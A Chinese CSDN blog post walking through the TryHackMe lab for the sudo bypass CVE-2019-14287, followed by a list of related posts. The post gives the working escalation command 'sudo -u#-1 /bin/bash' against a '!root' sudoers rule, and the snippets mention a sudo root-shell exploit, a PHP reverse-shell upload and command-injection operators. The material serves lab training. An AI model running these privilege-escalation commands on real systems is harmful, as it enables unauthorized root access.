Sudo Security Bypass(CVE-2019-14287)

最新推荐文章于 2023-09-07 19:22:27 发布
最新推荐文章于 2023-09-07 19:22:27 发布
阅读量159 收藏
点赞数
分类专栏: Try Hack Me靶机 文章标签: 黑盒测试 cve 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44101248/article/details/108853012
版权

Sudo Security Bypass

一个在Unix Sudo程序中探索CVE-2019-14287的靶场
CVE-2019-14287新版的sudo已经修复了该漏洞,但是版本<1.8.28的sudo还可能存在该漏洞
sudo是Uinx中的命令,用于以其它用户的身份执行命令(一般为root权限)
举个例子,比如root家目录下的文件只有root权限才能访问
你sudo后就是以root权限运行cat命令,就能查看root家目录下的文件
 
sudo的配置文件在/etc/sudoers
 
某些时候管理员会设置不允许已root权限允许命令
<user> ALL=(ALL:!root) NOPASSWD: ALL
这个设置可以以任何用户执行,除了root。
理论上看似很安全的设置,没法执行UID为0的权限sudo -u#0 <command>(rootUID为0)
但是如果你将UID设置为-1,sudo则会将其读取为0。sudo -u#-1 <command>
 
我们用实例演示
sudo -l 查看能sudo的命令,好家伙是个bash
 
直接sudo -u#-1 /bin/bash提升为root的bash
z4yn:)
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SECURITY 服务安全与监控/su/sudo/
lxh2019514的博客
05-27 355
Linux基本防护 一.用户账号安全 1.设置帐号有效期 使用change工具 -**d 0,强制修改密码 -E yyyy-mm-dd,指定失效日期(-1取消)** chage命令的语法格式: chage –l 账户名称 //查看账户信息 chage –E 时间 账户名称 ...
sudo-cve-2019-18634:CVE-2019-18634的概念证明
03-21
**sudo CVE-2019-18634 概念证明** sudo(Superuser DO)是Linux和Unix系统中的一个命令行工具,允许普通用户以超级用户(root)或其他用户的身份执行命令,通常用于管理系统。这个概念证明是关于CVE-2019-18634...
sudo protection bypass exploit
cnbird's blog
03-17 839
#!/bin/sh## root shell exploit for postfix + sudo# tested on debian powerpc unstable## by Charles core Stevenson core@bokeoa.com># Put your password here if youre not in the sudoers filePASSWORD=
系统安全 sudo机制
最新发布
Lachewuxian的博客
09-07 98
6锁定重要文件, /etc/passwd /etc/shadow /etc/fatab nginx.conf httpd.conf重要的配置文件或者系统文件,进行锁定。wheel默认为空,需要管理手动添加用户,配置响应的sudo访问规则,配置的时候一样要注意,有限放开原则。认证,但是如果认证返回失败,失败结果不会通知用户,所有的type的模块全部认证完毕,最后把结果反馈给用户。su -- pam.d找配置文件-----su-----li64/security---调用认证模块。
modsecurity内存泄露_ModSecurity存在旁路漏洞
weixin_39608132的博客
12-22 238
ModSecurity存在旁路漏洞,不过貌似只影响到Windows系统(ASP、ASP.NET),使用Linux/UNIX系统的朋友可以松口气~~~下面是具体信息:========================================================================ModSecurity (Core Rules) HPP Filter Bypass Vul...
【网络安全】DVWA之Content Security Policy (CSP) Bypass 攻击姿势及解题详析合集
等风来
06-16 3440
CSP 可以阻止恶意代码、恶意插件或其他不受信任的资源被加载到页面上,从而增加页面的安全性。通过合理配置 CSP,网站管理员可以严格限制哪些资源能被加载,从而减少恶意代码执行的风险。指令设置 nonce ,其目的是为了提供额外的安全性,确保只有具有相应 nonce 的脚本能够被执行。接下来的代码段是一个表单,允许用户输入内容,并将该内容直接输出到页面中。这行代码,禁用了浏览器的跨站脚本攻击(XSS)防护机制,以便内联的弹窗警告框能够正常工作。的函数,用于处理异步加载的远程脚本返回的数据。
cve-2019-11043复现(靶机为Ubuntu18.04,php编译安装)
ckm1607011的博客
02-29 873
最近做的项目需要复现nginx的exp,其中就包括cve-2019-11043这个exp,他是一个远程代码执行的exp; 这个cve的来源:GitHub - neex/phuip-fpizdam: Exploit for CVE-2019-11043 我看了之后在Kali上把源码编译了,大家注意编译需要1.13以上版本的go,编译出来的可执行文件在linux平台上就都可以执行了; 让我感到...
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞:CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
CVE-2019-19268:新发现0天!
04-16
CVE-2019-19268 受影响的版本:rConfig 3.9.2。 [描述] 由于配置错误,rConfig v3.9.2中存在多个攻击媒介,这允许本地用户通过sudo执行root命令。 [发现者] dmw0ng-不和谐:dmw0ng#4449 TheCyber​​Geek-不和谐...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
靶机渗透练习85-HackathonCTF 1
hirak0的博客
04-28 753
靶机描述 靶机地址:https://www.vulnhub.com/entry/hackathonctf-1,591/ Description N/A 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.3 靶机: IP地址:192.168.9.2 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 该靶机环境搭建如下 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式 将 VMware 中桥接模式网卡设置
常见的隐写工具的使用
z4yn:)的博客
09-28 5224
隐写术 常见的隐写工具的使用 steghide 隐藏文件 steghide embed -cf [载体] -ef [隐藏的文件] -p [设置密码] 例:steghide embed -cf sun.jpg -ef a.txt -p 123123 提取文件 steghide extract -sf sun.jpg steghide不支持png格式的隐写,zsteg支持png。 zsteg 用gem安装zsteg,没有小飞机的用国内的源 proxychains代理一挂,30秒安.
RootMe
z4yn:)的博客
10-09 951
RootMe 获取root权限 先Nmap扫全端口,开放了22,80端口 在用Nmap -A 综合扫描指定的开放端口 只能从80端口入手,访问80 尝试访问一下robots.txt文件,不存在 用dirbutser扫网站目录,我一般配合dirb一起扫 两个都扫到一个uploads目录和panel目录 uploads通常用来放上传的文件 访问panel目录是个上传点,直接上传一个反弹shell的PHP脚本 用的是kali自带的PH...
CTF靶机 Agent sudo 笔记
z4yn:)的博客
06-23 910
Agent sudo 靶机介绍 : 你在深海里发现了一个秘密服务器。你的任务是侵入服务器内部并揭示真相。 靶机标签 : 枚举, 利用, 爆破, hash破解 Nmap扫一下发现3个开放端口 21, 22, 80 先访问80端口 访问网站需要修改User-Agent 为C才能触发到指定页面 可用BurpSuite抓包修改 也可以用kali自带的curl自定义请求包 curl -A "C" -L 10.10.183.111 发现一个用户名chris,根据提示要用这个用户名去爆破ftp协议 用Burp Sui
CTF靶机 Pickle Rick 笔记
z4yn:)的博客
06-23 908
Pickle Rick 靶机介绍 : 瑞克和莫蒂CTF。帮忙把瑞克变回人类! 靶机标签 : dirbuster, Linux, 命令执行 Nmap扫端口, 开放两个端口 22, 80 访问80端口 用dirbuster扫了目录发现一个登录页面, 没有账号密码 找了半天没找到账号密码, 根据提示查看页面源码看到了账号 - -! 密码是之前访问的robots.txt文件 - -! 登录页面发现是一个命令执行窗口 ls 查看第一个原料 查看flag时发现 cat 被...
TryHackMe - Poster靶场
z4yn:)的博客
03-11 868
Poster The sys admin set up a rdbms in a safe way. 0x01 简介 什么是rdbms? 根据EF-Codd关系模型,RDBMS允许用户构建、更新、管理和与关系数据库交互,关系数据库将数据存储为表。 当前,一些公司使用关系数据库代替平面文件或层次数据库来存储业务数据。这是因为关系数据库可以处理范围广泛的数据格式并有效地处理查询。此外,它将数据组织到可以基于公共数据进行内部链接的表中。这允许用户通过单个查询轻松检索一个或多个表。另一方面,平面文件将数据
命令执行
z4yn:)的博客
09-28 626
Injection 操作系统命令注入演练。演示OS命令注入 命令注入也称为命令注入 PHP常见的执行命令的函数:system() ; exec() ; shell_exec() ; popen() ; passthru() 等等。函数的返回结果不同,各位自行查阅。 Windows和Linux都支持的命令连接符 cmd1 | cmd2 只执行cmd2 cmd1 || cmd2 只有当cmd1执行失败后,cmd2才被执行 cmd1 &am...
linux sudo提权漏洞,linux CVE-2019-14287 Sudo提权漏洞(示例代码)
05-19
CVE-2019-14287是一个sudo提权漏洞,攻击者可以利用此漏洞绕过sudo的限制,以root用户的身份执行命令。这个漏洞影响sudo 1.8.28版本之前的所有版本。下面是一个示例代码: ``` $ sudo -u#-1 id uid=0(root) gid=0...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值